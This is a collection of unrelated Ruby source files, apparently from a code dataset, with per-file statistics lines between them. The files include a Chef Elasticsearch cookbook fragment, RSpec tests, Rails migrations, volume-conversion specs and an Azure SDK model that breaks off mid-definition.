owner es_user.username
group es_user.groupname
mode '0755'
recursive true
action :nothing
end
d.run_action(:create)
new_resource.updated_by_last_action(true) if d.updated_by_last_action?
end
# Create elasticsearch shell variables file
#
# Valid values in /etc/sysconfig/elasticsearch or /etc/default/elasticsearch
# ES_HOME JAVA_HOME ES_PATH_CONF DATA_DIR LOG_DIR PID_DIR ES_JAVA_OPTS
# RESTART_ON_UPGRADE ES_USER ES_GROUP ES_STARTUP_SLEEP_TIME MAX_OPEN_FILES
# MAX_LOCKED_MEMORY MAX_MAP_COUNT
#
# We provide these values as resource attributes/parameters directly
params = {}
params[:ES_HOME] = new_resource.path_home
params[:JAVA_HOME] = new_resource.java_home
params[:ES_PATH_CONF] = new_resource.path_conf
params[:DATA_DIR] = new_resource.path_data
params[:LOG_DIR] = new_resource.path_logs
params[:PID_DIR] = new_resource.path_pid
params[:RESTART_ON_UPGRADE] = new_resource.restart_on_upgrade
params[:ES_USER] = es_user.username if es_install.type == 'tarball'
params[:ES_GROUP] = es_user.groupname if es_install.type == 'tarball'
params[:ES_STARTUP_SLEEP_TIME] = new_resource.startup_sleep_seconds.to_s
params[:MAX_OPEN_FILES] = new_resource.nofile_limit
params[:MAX_LOCKED_MEMORY] = new_resource.memlock_limit
params[:MAX_MAP_COUNT] = new_resource.max_map_count
default_config_name = es_svc.service_name || es_svc.instance_name || new_resource.instance_name || 'elasticsearch'
shell_template = template "elasticsearch.in.sh-#{default_config_name}" do
path %w[rhel amazon].include?(node['platform_family']) ? "/etc/sysconfig/#{default_config_name}" : "/etc/default/#{default_config_name}"
source new_resource.template_elasticsearch_env
cookbook new_resource.cookbook_elasticsearch_env
mode '0644'
variables(params: params)
action :nothing
end
shell_template.run_action(:create)
new_resource.updated_by_last_action(true) if shell_template.updated_by_last_action?
# Create jvm.options file
#
jvm_options_template = template "jvm_options-#{default_config_name}" do
path "#{new_resource.path_conf}/jvm.options"
source new_resource.template_jvm_options
cookbook new_resource.cookbook_jvm_options
owner es_user.username
group es_user.groupname
mode '0644'
variables(jvm_options: [
"-Xms#{new_resource.allocated_memory}",
"-Xmx#{new_resource.allocated_memory}",
new_resource.jvm_options,
].flatten.join("\n"))
action :nothing
end
jvm_options_template.run_action(:create)
new_resource.updated_by_last_action(true) if jvm_options_template.updated_by_last_action?
# Create ES logging file
#
logging_template = template "log4j2_properties-#{default_config_name}" do
path "#{new_resource.path_conf}/log4j2.properties"
source new_resource.template_log4j2_properties
cookbook new_resource.cookbook_log4j2_properties
owner es_user.username
group es_user.groupname
mode '0640'
variables(logging: new_resource.logging)
action :nothing
end
logging_template.run_action(:create)
new_resource.updated_by_last_action(true) if logging_template.updated_by_last_action?
# Create ES elasticsearch.yml file
#
merged_configuration = default_configuration.merge(new_resource.configuration.dup)
# warn if someone is using symbols. we don't support.
found_symbols = merged_configuration.keys.select { |s| s.is_a?(Symbol) }
unless found_symbols.empty?
Chef::Log.warn("Please change the following to strings in order to work with this Elasticsearch cookbook: #{found_symbols.join(',')}")
end
# workaround for https://github.com/elastic/cookbook-elasticsearch/issues/590
config_vars = ElasticsearchCookbook::HashAndMashBlender.new(merged_configuration).to_hash
yml_template = template "elasticsearch.yml-#{default_config_name}" do
path "#{new_resource.path_conf}/elasticsearch.yml"
source new_resource.template_elasticsearch_yml
cookbook new_resource.cookbook_elasticsearch_yml
owner es_user.username
group es_user.groupname
mode '0640'
helpers(ElasticsearchCookbook::Helpers)
variables(config: config_vars)
action :nothing
end
yml_template.run_action(:create)
new_resource.updated_by_last_action(true) if yml_template.updated_by_last_action?
end
end
| 40.260606 | 142 | 0.735812 |
b97aeb435b97b84433c46f8a1221e65f122c23b1 | 1,959 | # frozen_string_literal: true
require 'spec_helper'
RSpec.describe BulkImports::Groups::Pipelines::EntityFinisher do
it 'updates the entity status to finished' do
entity = create(:bulk_import_entity, :started)
pipeline_tracker = create(:bulk_import_tracker, entity: entity)
context = BulkImports::Pipeline::Context.new(pipeline_tracker)
subject = described_class.new(context)
expect_next_instance_of(Gitlab::Import::Logger) do |logger|
expect(logger)
.to receive(:info)
.with(
bulk_import_id: entity.bulk_import.id,
bulk_import_entity_id: entity.id,
bulk_import_entity_type: entity.source_type,
pipeline_class: described_class.name,
message: 'Entity finished'
)
end
expect { subject.run }
.to change(entity, :status_name).to(:finished)
end
context 'when entity is in a final finished or failed state' do
shared_examples 'performs no state update' do |entity_state|
it 'does nothing' do
entity = create(:bulk_import_entity, entity_state)
pipeline_tracker = create(:bulk_import_tracker, entity: entity)
context = BulkImports::Pipeline::Context.new(pipeline_tracker)
subject = described_class.new(context)
expect { subject.run }
.not_to change(entity, :status_name)
end
end
include_examples 'performs no state update', :finished
include_examples 'performs no state update', :failed
end
context 'when all entity trackers failed' do
it 'marks entity as failed' do
entity = create(:bulk_import_entity, :started)
create(:bulk_import_tracker, :failed, entity: entity)
pipeline_tracker = create(:bulk_import_tracker, entity: entity, relation: described_class)
context = BulkImports::Pipeline::Context.new(pipeline_tracker)
described_class.new(context).run
expect(entity.reload.failed?).to eq(true)
end
end
end
| 33.775862 | 96 | 0.699847 |
117e9cbeb1a1d50bf3459ad4dd861b8814764d0a | 368 | # frozen_string_literal: true
module Creators
class CollectionCreator
attr_accessor :collection
def initialize(user:, form:)
@user = user
@form = form
end
def call
@collection = @user.collections.new(
name: @form.name,
description: @form.description
)
@collection.save!
self
end
end
end
| 15.333333 | 42 | 0.608696 |
1c12b145cac846460aca68193d6170451181fb50 | 1,467 | require 'rails_helper'
# IMPORTANT: Add spec/support/tasks.rb to your project to load rake tasks.
RSpec.describe "Subscription tasks", :type => :task do
context "subscription:confirmation_overdue:delete" do
before do
# Freeze time as task is time-sensitive
travel_to Time.now
end
after { travel_back }
it "leaves unconfirmed subscriptions of age 3 days or younger" do
not_overdue = create_list(:subscription, 2, confirmed: false, created_at: 3.days.ago)
expect { invoke_task }.not_to change { Subscription.count }
end
it "deletes unconfirmed subscriptions of age more than 3 days" do
overdue = create_list(:subscription, 2, confirmed: false, created_at: (3.days + 1.second).ago)
expect { invoke_task }.to change { Subscription.count }.from(2).to(0)
end
it "ends gracefully when no subscriptions exist" do
expect { invoke_task }.not_to raise_error
end
it "leaves confirmed subscriptions alone" do
confirmed = create(:subscription, confirmed: true, created_at: 1.year.ago)
expect { invoke_task }.not_to change { Subscription.count }
end
private
def invoke_task
task = Rake::Task["subscription:confirmation_overdue:delete"]
# Ensure task is re-enabled, as rake tasks by default are disabled
# after running once within a process http://pivotallabs.com/how-i-test-rake-tasks/
task.reenable
task.invoke
end
end
end
| 30.5625 | 100 | 0.698705 |
39d0fa8f37c0e319abc655c71709302a7beef127 | 750 | # frozen_string_literal: true
require 'rdown/version'
module Rdown
autoload :Errors, 'rdown/errors'
autoload :Nodes, 'rdown/nodes'
autoload :Parser, 'rdown/parser'
autoload :Position, 'rdown/position'
autoload :PositionDelta, 'rdown/position_delta'
autoload :PreProcessor, 'rdown/pre_processor'
autoload :Serializable, 'rdown/serializable'
autoload :SourceMap, 'rdown/source_map'
autoload :Tokenizer, 'rdown/tokenizer'
autoload :Tokens, 'rdown/tokens'
class << self
# @param [String]
# @return [Rdown::Nodes::Base]
def parse(source)
pre_processed_source = ::Rdown::PreProcessor.call(source)
tokens = ::Rdown::Tokenizer.call(**pre_processed_source)
::Rdown::Parser.call(tokens)
end
end
end
| 27.777778 | 63 | 0.713333 |
b9ff9e77db80d3954379a11db95a715bb9cc4b5c | 232 | class AddCommentToPostComments < ActiveRecord::Migration[5.2]
def change
add_column :post_comments, :user_id, :integer
add_column :post_comments, :post_id, :integer
add_column :post_comments, :comment, :text
end
end
| 29 | 61 | 0.75431 |
ffd1b3e8a795e339925dd703c3170c63b5ee2376 | 909 | # coding: utf-8
module ONIX
class OtherText
include Virtus.model
attribute :text_type_code, Integer
attribute :text_format
attribute :text
attribute :text_link_type,Integer
attribute :text_link
attribute :text_author
def to_xml
OtherTextRepresenter.new(self).to_xml
end
def self.from_xml(data)
OtherTextRepresenter.new(self.new).from_xml(data)
end
end
class OtherTextRepresenter < Representable::Decorator
include Representable::XML
self.representation_wrap = :OtherText
property :text_type_code, as: "TextTypeCode", render_filter: ::ONIX::Formatters::TWO_DIGITS
property :text_format, as: "TextFormat"
property :text, as: "Text"
property :text_link_type, as: "TextLinkType", render_filter: ::ONIX::Formatters::TWO_DIGITS
property :text_link, as: "TextLink"
property :text_author, as: "TextAuthor"
end
end
| 25.25 | 95 | 0.721672 |
bbe938122eaecec9c294948bddbfaa7a20761ac9 | 383 | class CreateQualifyings < ActiveRecord::Migration[6.0]
def change
create_table :qualifyings do |t|
t.bigint :race_id, null: false
t.bigint :driver_id, null: false
t.bigint :constructor_id, null: false
t.integer :number, null: false
t.integer :position
t.string :q1
t.string :q2
t.string :q3
t.timestamps
end
end
end
| 22.529412 | 54 | 0.637076 |
87bb83524b3bb8180393a6d43c6b17337f6e0079 | 6,532 | # encoding: UTF-8
require 'spec_helper'
RSpec.describe Measurement do
describe 'kiloliters' do
subject { described_class.parse('1 kl') }
it 'converts to hectoliters' do
expect(subject.convert_to(:hl).quantity).to eq 10
end
it 'converts to dekaliters' do
expect(subject.convert_to(:dal).quantity).to eq 100
end
it 'converts to liters' do
expect(subject.convert_to(:l).quantity).to eq 1_000
end
it 'converts to deciliters' do
expect(subject.convert_to(:dl).quantity).to eq 10_000
end
it 'converts to centiliters' do
expect(subject.convert_to(:cl).quantity).to eq 100_000
end
it 'converts to milliliters' do
expect(subject.convert_to(:ml).quantity).to eq 1_000_000
end
it 'converts to microliters' do
expect(subject.convert_to(:µl).quantity).to eq 10_000_000
end
end
describe 'hectoliters' do
subject { described_class.parse('10 hl') }
it 'converts to kiloliters' do
expect(subject.convert_to(:kl).quantity).to eq 1
end
it 'converts to dekaliters' do
expect(subject.convert_to(:dal).quantity).to eq 100
end
it 'converts to liters' do
expect(subject.convert_to(:l).quantity).to eq 1_000
end
it 'converts to deciliters' do
expect(subject.convert_to(:dl).quantity).to eq 10_000
end
it 'converts to centiliters' do
expect(subject.convert_to(:cl).quantity).to eq 100_000
end
it 'converts to milliliters' do
expect(subject.convert_to(:ml).quantity).to eq 1_000_000
end
it 'converts to microliters' do
expect(subject.convert_to(:µl).quantity).to eq 10_000_000
end
end
describe 'dekaliters' do
subject { described_class.parse('100 dal') }
it 'converts to kiloliters' do
expect(subject.convert_to(:kl).quantity).to eq 1
end
it 'converts to hectoliters' do
expect(subject.convert_to(:hl).quantity).to eq 10
end
it 'converts to liters' do
expect(subject.convert_to(:l).quantity).to eq 1_000
end
it 'converts to deciliters' do
expect(subject.convert_to(:dl).quantity).to eq 10_000
end
it 'converts to centiliters' do
expect(subject.convert_to(:cl).quantity).to eq 100_000
end
it 'converts to milliliters' do
expect(subject.convert_to(:ml).quantity).to eq 1_000_000
end
it 'converts to microliters' do
expect(subject.convert_to(:µl).quantity).to eq 10_000_000
end
end
describe 'liters' do
subject { described_class.parse('1000 l') }
it 'converts to kiloliters' do
expect(subject.convert_to(:kl).quantity).to eq 1
end
it 'converts to hectoliters' do
expect(subject.convert_to(:hl).quantity).to eq 10
end
it 'converts to dekaliters' do
expect(subject.convert_to(:dal).quantity).to eq 100
end
it 'converts to deciliters' do
expect(subject.convert_to(:dl).quantity).to eq 10_000
end
it 'converts to centiliters' do
expect(subject.convert_to(:cl).quantity).to eq 100_000
end
it 'converts to milliliters' do
expect(subject.convert_to(:ml).quantity).to eq 1_000_000
end
it 'converts to microliters' do
expect(subject.convert_to(:µl).quantity).to eq 10_000_000
end
end
describe 'deciliters' do
subject { described_class.parse('10000 dl') }
it 'converts to kiloliters' do
expect(subject.convert_to(:kl).quantity).to eq 1
end
it 'converts to hectoliters' do
expect(subject.convert_to(:hl).quantity).to eq 10
end
it 'converts to dekaliters' do
expect(subject.convert_to(:dal).quantity).to eq 100
end
it 'converts to liters' do
expect(subject.convert_to(:l).quantity).to eq 1_000
end
it 'converts to centiliters' do
expect(subject.convert_to(:cl).quantity).to eq 100_000
end
it 'converts to milliliters' do
expect(subject.convert_to(:ml).quantity).to eq 1_000_000
end
it 'converts to microliters' do
expect(subject.convert_to(:µl).quantity).to eq 10_000_000
end
end
describe 'centiliters' do
subject { described_class.parse('100000 cl') }
it 'converts to kiloliters' do
expect(subject.convert_to(:kl).quantity).to eq 1
end
it 'converts to hectoliters' do
expect(subject.convert_to(:hl).quantity).to eq 10
end
it 'converts to dekaliters' do
expect(subject.convert_to(:dal).quantity).to eq 100
end
it 'converts to liters' do
expect(subject.convert_to(:l).quantity).to eq 1_000
end
it 'converts to deciliters' do
expect(subject.convert_to(:dl).quantity).to eq 10_000
end
it 'converts to milliliters' do
expect(subject.convert_to(:ml).quantity).to eq 1_000_000
end
it 'converts to microliters' do
expect(subject.convert_to(:µl).quantity).to eq 10_000_000
end
end
describe 'milliliters' do
subject { described_class.parse('1000000 ml') }
it 'converts to kiloliters' do
expect(subject.convert_to(:kl).quantity).to eq 1
end
it 'converts to hectoliters' do
expect(subject.convert_to(:hl).quantity).to eq 10
end
it 'converts to dekaliters' do
expect(subject.convert_to(:dal).quantity).to eq 100
end
it 'converts to liters' do
expect(subject.convert_to(:l).quantity).to eq 1_000
end
it 'converts to deciliters' do
expect(subject.convert_to(:dl).quantity).to eq 10_000
end
it 'converts to centiliters' do
expect(subject.convert_to(:cl).quantity).to eq 100_000
end
it 'converts to microliters' do
expect(subject.convert_to(:µl).quantity).to eq 10_000_000
end
end
describe 'microliters' do
subject { described_class.parse('10000000 µl') }
it 'converts to kiloliters' do
expect(subject.convert_to(:kl).quantity).to eq 1
end
it 'converts to hectoliters' do
expect(subject.convert_to(:hl).quantity).to eq 10
end
it 'converts to dekaliters' do
expect(subject.convert_to(:dal).quantity).to eq 100
end
it 'converts to liters' do
expect(subject.convert_to(:l).quantity).to eq 1_000
end
it 'converts to deciliters' do
expect(subject.convert_to(:dl).quantity).to eq 10_000
end
it 'converts to centiliters' do
expect(subject.convert_to(:cl).quantity).to eq 100_000
end
it 'converts to milliliters' do
expect(subject.convert_to(:ml).quantity).to eq 1_000_000
end
end
end
| 24.931298 | 63 | 0.672994 |
7af75c2725a6d98b9ffc2d11fa1d491b0fad1ffa | 408 | class User < ApplicationRecord
before_save { self.email = email.downcase }
validates :name, presence: true, length: { maximum: 50 }
VALID_EMAIL_REGEX = /\A[\w+\-.]+@[a-z\d\-.]+\.[a-z]+\z/i
validates :email, presence: true, length: { maximum: 255 },
format: { with: VALID_EMAIL_REGEX }
has_secure_password
validates :password, presence: true, length: { minimum: 6 }
end
| 40.8 | 61 | 0.634804 |
012152f83fc6ea2d363a8e5591d2442669a148a6 | 2,072 | module Terrazine
class Builder
# doesn't use Predicates
# use Operators, Expressions
private
# TODO: split
def build_tables(structure)
case structure
when Array
if check_alias(structure.first) # VALUES function or ...?
build_operator(structure)
# if it's a array with strings/values || array of tables/values
else
joiner = structure.select { |i| i.is_a? Array }.empty? ? ' ' : ', '
structure.map { |i| build_tables i }.join joiner
end
when Hash
"(#{build_sql structure})"
when String, Symbol
structure
else
raise "Undefined structure for FROM - #{structure}"
end
end
# TODO: split
def build_columns(structure, prefix = nil)
case structure
when Array
# SQL function - in format: "_#{fn}"
if check_alias(structure.first)
build_operator structure, prefix
else
structure.map { |i| build_columns i, prefix }.join ', '
end
when Hash
# sub_query
if structure[:select]
"(#{build_sql(structure)})"
# colum OR table alias
else
iterate_hash(structure) do |k, v|
if check_alias(k)
# update ruby for delete_prefix? =)
"#{build_columns(v, prefix)} AS #{k.to_s.sub(/^_/, '')}"
# construct_as(build_columns(v, prefix), k)
else
build_columns(v, k.to_s)
end
end
end
when Symbol, String, Integer
structure = structure.to_s
if prefix && structure !~ /, |\.|\(/
"#{prefix}.#{structure}"
else
structure
end
when Constructor
"(#{build_sql structure.structure})"
when true # choose everything -_-
build_columns('*', prefix)
else # TODO: values from value passing here... -_-
structure
# raise "Undefined class: #{structure.class} of #{structure}" # TODO: ERRORS class
end
end
end
end
| 28.383562 | 90 | 0.54971 |
335cade3bfe7391784bf8ddc5980b3aa15506f7d | 2,104 | # -*- encoding: utf-8 -*-
# stub: railties 5.2.0 ruby lib
Gem::Specification.new do |s|
s.name = "railties".freeze
s.version = "5.2.0"
s.required_rubygems_version = Gem::Requirement.new(">= 0".freeze) if s.respond_to? :required_rubygems_version=
s.metadata = { "changelog_uri" => "https://github.com/rails/rails/blob/v5.2.0/railties/CHANGELOG.md", "source_code_uri" => "https://github.com/rails/rails/tree/v5.2.0/railties" } if s.respond_to? :metadata=
s.require_paths = ["lib".freeze]
s.authors = ["David Heinemeier Hansson".freeze]
s.bindir = "exe".freeze
s.date = "2018-04-09"
s.description = "Rails internals: application bootup, plugins, generators, and rake tasks.".freeze
s.email = "[email protected]".freeze
s.executables = ["rails".freeze]
s.files = ["exe/rails".freeze]
s.homepage = "http://rubyonrails.org".freeze
s.licenses = ["MIT".freeze]
s.rdoc_options = ["--exclude".freeze, ".".freeze]
s.required_ruby_version = Gem::Requirement.new(">= 2.2.2".freeze)
s.rubygems_version = "3.1.2".freeze
s.summary = "Tools for creating, working with, and running Rails applications.".freeze
s.installed_by_version = "3.1.2" if s.respond_to? :installed_by_version
if s.respond_to? :specification_version then
s.specification_version = 4
end
if s.respond_to? :add_runtime_dependency then
s.add_runtime_dependency(%q<activesupport>.freeze, ["= 5.2.0"])
s.add_runtime_dependency(%q<actionpack>.freeze, ["= 5.2.0"])
s.add_runtime_dependency(%q<rake>.freeze, [">= 0.8.7"])
s.add_runtime_dependency(%q<thor>.freeze, [">= 0.18.1", "< 2.0"])
s.add_runtime_dependency(%q<method_source>.freeze, [">= 0"])
s.add_development_dependency(%q<actionview>.freeze, ["= 5.2.0"])
else
s.add_dependency(%q<activesupport>.freeze, ["= 5.2.0"])
s.add_dependency(%q<actionpack>.freeze, ["= 5.2.0"])
s.add_dependency(%q<rake>.freeze, [">= 0.8.7"])
s.add_dependency(%q<thor>.freeze, [">= 0.18.1", "< 2.0"])
s.add_dependency(%q<method_source>.freeze, [">= 0"])
s.add_dependency(%q<actionview>.freeze, ["= 5.2.0"])
end
end
| 44.765957 | 208 | 0.67538 |
284da843eb65fc967036a17649a1dc7f2e4832a7 | 228 | class CreateInvitationsUsers < ActiveRecord::Migration[5.2]
def change
create_table :invitations_users, id: false do |t|
t.belongs_to :invitation, index: true
t.belongs_to :user, index: true
end
end
end
| 25.333333 | 59 | 0.70614 |
38017db05b2043cc0ab139927ceeae02d528a61f | 78 | # frozen_string_literal: true
module ActsAsRemovable
VERSION = '3.1.1'
end
| 13 | 29 | 0.75641 |
87500d1c8199ed1a03b6becd2219a9225a130901 | 756 | require 'cgi'
require 'json'
require 'httparty'
require 'smarty_streets/version'
require 'smarty_streets/configuration'
require 'smarty_streets/location'
require 'smarty_streets/request'
module SmartyStreets
class << self
attr_accessor :configuration
# Call this method to set your configuration.
#
# SmartyStreets.configure do |config|
# config.auth_id = 'AUTHID'
# config.auth_token = 'AUTHTOKEN'
# config.candidates = 1
# end
def configure
self.configuration = Configuration.new
yield(configuration)
end
# Request standardization for an address
def standardize
location = Location.new
yield(location)
Request.new(location).standardize!
end
end
end
| 22.909091 | 49 | 0.691799 |
6227e42019d39612b0e051edfcb1b336de1796ab | 13,561 | # Use this hook to configure devise mailer, warden hooks and so forth.
# Many of these configuration options can be set straight in your model.
Devise.setup do |config|
# The secret key used by Devise. Devise uses this key to generate
# random tokens. Changing this key will render invalid all existing
# confirmation, reset password and unlock tokens in the database.
# Devise will use the `secret_key_base` as its `secret_key`
# by default. You can change it below and use your own secret key.
# config.secret_key = '8eb6d24926c2c4766a2354b854c2a09d153b3890db03abee4ae28d3c1a40854371869dba4c3bf342355c96cdccd0a6357d227ffd34abd9c0f42bfc6a731536ec'
# ==> Mailer Configuration
# Configure the e-mail address which will be shown in Devise::Mailer,
# note that it will be overwritten if you use your own mailer class
# with default "from" parameter.
config.mailer_sender = '[email protected]'
# Configure the class responsible to send e-mails.
# config.mailer = 'Devise::Mailer'
# Configure the parent class responsible to send e-mails.
# config.parent_mailer = 'Erp::ApplicationMailer'
# ==> ORM configuration
# Load and configure the ORM. Supports :active_record (default) and
# :mongoid (bson_ext recommended) by default. Other ORMs may be
# available as additional gems.
require 'devise/orm/active_record'
# ==> Configuration for any authentication mechanism
# Configure which keys are used when authenticating a user. The default is
# just :email. You can configure it to use [:username, :subdomain], so for
# authenticating a user, both parameters are required. Remember that those
# parameters are used only when authenticating and not when retrieving from
# session. If you need permissions, you should implement that in a before filter.
# You can also supply a hash where the value is a boolean determining whether
# or not authentication should be aborted when the value is not present.
# config.authentication_keys = [:email]
# Configure parameters from the request object used for authentication. Each entry
# given should be a request method and it will automatically be passed to the
# find_for_authentication method and considered in your model lookup. For instance,
# if you set :request_keys to [:subdomain], :subdomain will be used on authentication.
# The same considerations mentioned for authentication_keys also apply to request_keys.
# config.request_keys = []
# Configure which authentication keys should be case-insensitive.
# These keys will be downcased upon creating or modifying a user and when used
# to authenticate or find a user. Default is :email.
config.case_insensitive_keys = [:email]
# Configure which authentication keys should have whitespace stripped.
# These keys will have whitespace before and after removed upon creating or
# modifying a user and when used to authenticate or find a user. Default is :email.
config.strip_whitespace_keys = [:email]
# Tell if authentication through request.params is enabled. True by default.
# It can be set to an array that will enable params authentication only for the
# given strategies, for example, `config.params_authenticatable = [:database]` will
# enable it only for database (email + password) authentication.
# config.params_authenticatable = true
# Tell if authentication through HTTP Auth is enabled. False by default.
# It can be set to an array that will enable http authentication only for the
# given strategies, for example, `config.http_authenticatable = [:database]` will
# enable it only for database authentication. The supported strategies are:
# :database = Support basic authentication with authentication key + password
# config.http_authenticatable = false
# If 401 status code should be returned for AJAX requests. True by default.
# config.http_authenticatable_on_xhr = true
# The realm used in Http Basic Authentication. 'Application' by default.
# config.http_authentication_realm = 'Application'
# It will change confirmation, password recovery and other workflows
# to behave the same regardless if the e-mail provided was right or wrong.
# Does not affect registerable.
# config.paranoid = true
# By default Devise will store the user in session. You can skip storage for
# particular strategies by setting this option.
# Notice that if you are skipping storage for all authentication paths, you
# may want to disable generating routes to Devise's sessions controller by
# passing skip: :sessions to `devise_for` in your config/routes.rb
config.skip_session_storage = [:http_auth]
# By default, Devise cleans up the CSRF token on authentication to
# avoid CSRF token fixation attacks. This means that, when using AJAX
# requests for sign in and sign up, you need to get a new CSRF token
# from the server. You can disable this option at your own risk.
# config.clean_up_csrf_token_on_authentication = true
# When false, Devise will not attempt to reload routes on eager load.
# This can reduce the time taken to boot the app but if your application
# requires the Devise mappings to be loaded during boot time the application
# won't boot properly.
# config.reload_routes = true
# ==> Configuration for :database_authenticatable
# For bcrypt, this is the cost for hashing the password and defaults to 11. If
# using other algorithms, it sets how many times you want the password to be hashed.
#
# Limiting the stretches to just one in testing will increase the performance of
# your test suite dramatically. However, it is STRONGLY RECOMMENDED to not use
# a value less than 10 in other environments. Note that, for bcrypt (the default
# algorithm), the cost increases exponentially with the number of stretches (e.g.
# a value of 20 is already extremely slow: approx. 60 seconds for 1 calculation).
config.stretches = Rails.env.test? ? 1 : 11
# Set up a pepper to generate the hashed password.
# config.pepper = 'ec87a1d817c6a175a9e9d97868ceb41b975e43ac756f11f55fd6bb63e7fb693f1c7d4c9ecd060c002814e279a3a4a811e9467c512500a8c93acd149e6e756ede'
# Send a notification email when the user's password is changed
# config.send_password_change_notification = false
# ==> Configuration for :confirmable
# A period that the user is allowed to access the website even without
# confirming their account. For instance, if set to 2.days, the user will be
# able to access the website for two days without confirming their account,
# access will be blocked just in the third day. Default is 0.days, meaning
# the user cannot access the website without confirming their account.
# config.allow_unconfirmed_access_for = 2.days
# A period that the user is allowed to confirm their account before their
# token becomes invalid. For example, if set to 3.days, the user can confirm
# their account within 3 days after the mail was sent, but on the fourth day
# their account can't be confirmed with the token any more.
# Default is nil, meaning there is no restriction on how long a user can take
# before confirming their account.
# config.confirm_within = 3.days
# If true, requires any email changes to be confirmed (exactly the same way as
# initial account confirmation) to be applied. Requires additional unconfirmed_email
# db field (see migrations). Until confirmed, new email is stored in
# unconfirmed_email column, and copied to email column on successful confirmation.
config.reconfirmable = false
# Defines which key will be used when confirming an account
# config.confirmation_keys = [:email]
# ==> Configuration for :rememberable
# The time the user will be remembered without asking for credentials again.
# config.remember_for = 2.weeks
# Invalidates all the remember me tokens when the user signs out.
config.expire_all_remember_me_on_sign_out = true
# If true, extends the user's remember period when remembered via cookie.
# config.extend_remember_period = false
# Options to be passed to the created cookie. For instance, you can set
# secure: true in order to force SSL only cookies.
# config.rememberable_options = {}
# ==> Configuration for :validatable
# Range for password length.
config.password_length = 6..128
# Email regex used to validate email formats. It simply asserts that
# one (and only one) @ exists in the given string. This is mainly
# to give user feedback and not to assert the e-mail validity.
config.email_regexp = /\A[^@\s]+@[^@\s]+\z/
# ==> Configuration for :timeoutable
# The time you want to timeout the user session without activity. After this
# time the user will be asked for credentials again. Default is 30 minutes.
# config.timeout_in = 30.minutes
# ==> Configuration for :lockable
# Defines which strategy will be used to lock an account.
# :failed_attempts = Locks an account after a number of failed attempts to sign in.
# :none = No lock strategy. You should handle locking by yourself.
# config.lock_strategy = :failed_attempts
# Defines which key will be used when locking and unlocking an account
# config.unlock_keys = [:email]
# Defines which strategy will be used to unlock an account.
# :email = Sends an unlock link to the user email
# :time = Re-enables login after a certain amount of time (see :unlock_in below)
# :both = Enables both strategies
# :none = No unlock strategy. You should handle unlocking by yourself.
# config.unlock_strategy = :both
# Number of authentication tries before locking an account if lock_strategy
# is failed attempts.
# config.maximum_attempts = 20
# Time interval to unlock the account if :time is enabled as unlock_strategy.
# config.unlock_in = 1.hour
# Warn on the last attempt before the account is locked.
# config.last_attempt_warning = true
# ==> Configuration for :recoverable
#
# Defines which key will be used when recovering the password for an account
# config.reset_password_keys = [:email]
# Time interval you can reset your password with a reset password key.
# Don't put a too small interval or your users won't have the time to
# change their passwords.
config.reset_password_within = 6.hours
# When set to false, does not sign a user in automatically after their password is
# reset. Defaults to true, so a user is signed in automatically after a reset.
# config.sign_in_after_reset_password = true
# ==> Configuration for :encryptable
# Allow you to use another hashing or encryption algorithm besides bcrypt (default).
# You can use :sha1, :sha512 or algorithms from others authentication tools as
# :clearance_sha1, :authlogic_sha512 (then you should set stretches above to 20
# for default behavior) and :restful_authentication_sha1 (then you should set
# stretches to 10, and copy REST_AUTH_SITE_KEY to pepper).
#
# Require the `devise-encryptable` gem when using anything other than bcrypt
# config.encryptor = :sha512
# ==> Scopes configuration
# Turn scoped views on. Before rendering "sessions/new", it will first check for
# "users/sessions/new". It's turned off by default because it's slower if you
# are using only default views.
# config.scoped_views = false
# Configure the default scope given to Warden. By default it's the first
# devise role declared in your routes (usually :user).
# config.default_scope = :user
# Set this configuration to false if you want /users/sign_out to sign out
# only the current scope. By default, Devise signs out all scopes.
config.sign_out_all_scopes = false
# ==> Navigation configuration
# Lists the formats that should be treated as navigational. Formats like
# :html, should redirect to the sign in page when the user does not have
# access, but formats like :xml or :json, should return 401.
#
# If you have any extra navigational formats, like :iphone or :mobile, you
# should add them to the navigational formats lists.
#
# The "*/*" below is required to match Internet Explorer requests.
# config.navigational_formats = ['*/*', :html]
# The default HTTP method used to sign out a resource. Default is :delete.
config.sign_out_via = :delete
# ==> OmniAuth
# Add a new OmniAuth provider. Check the wiki for more information on setting
# up on your models and hooks.
# config.omniauth :github, 'APP_ID', 'APP_SECRET', scope: 'user,public_repo'
# ==> Warden configuration
# If you want to use other strategies, that are not supported by Devise, or
# change the failure app, you can configure them inside the config.warden block.
#
# config.warden do |manager|
# manager.intercept_401 = false
# manager.default_strategies(scope: :user).unshift :some_external_strategy
# end
# ==> Mountable engine configurations
# When using Devise inside an engine, let's call it `MyEngine`, and this engine
# is mountable, there are some extra configurations to be taken into account.
# The following options are available, assuming the engine is mounted as:
#
# mount MyEngine, at: '/my_engine'
#
# The router that invoked `devise_for`, in the example above, would be:
# config.router_name = :my_engine
#
# When using OmniAuth, Devise cannot automatically set OmniAuth path,
# so you need to do it manually. For the users scope, it would be:
# config.omniauth_path_prefix = '/my_engine/users/auth'
config.router_name = :erp
config.parent_controller = 'Erp::ApplicationController'
end
| 48.956679 | 154 | 0.751198 |
398fdc91cfb6d83246afab13c16f009e87a9ab1c | 231 | module ChartmogulClient::Consts
module ApiVersions
V1 = 'v1'
end
module HttpStatuses
BAD_REQUEST = 400
SERVER_ERROR = 500
end
module HttpMethods
GET = :get
POST = :post
DELETE = :delete
end
end | 14.4375 | 31 | 0.65368 |
61f8e2ab187a0a9aa5cfaccb373b8a6c0e12c7ca | 6,344 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::Network::Mgmt::V2019_04_01
module Models
#
# Private endpoint resource.
#
class PrivateEndpoint < Resource
include MsRestAzure
# @return [Subnet] The ID of the subnet from which the private IP will be
# allocated.
attr_accessor :subnet
# @return [Array<NetworkInterface>] Gets an array of references to the
# network interfaces created for this private endpoint.
attr_accessor :network_interfaces
# @return [String] The provisioning state of the private endpoint.
# Possible values are: 'Updating', 'Deleting', and 'Failed'.
attr_accessor :provisioning_state
# @return [Array<PrivateLinkServiceConnection>] A grouping of information
# about the connection to the remote resource.
attr_accessor :private_link_service_connections
# @return [Array<PrivateLinkServiceConnection>] A grouping of information
# about the connection to the remote resource. Used when the network
# admin does not have access to approve connections to the remote
# resource.
attr_accessor :manual_private_link_service_connections
# @return [String] Gets a unique read-only string that changes whenever
# the resource is updated.
attr_accessor :etag
#
# Mapper for PrivateEndpoint class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'PrivateEndpoint',
type: {
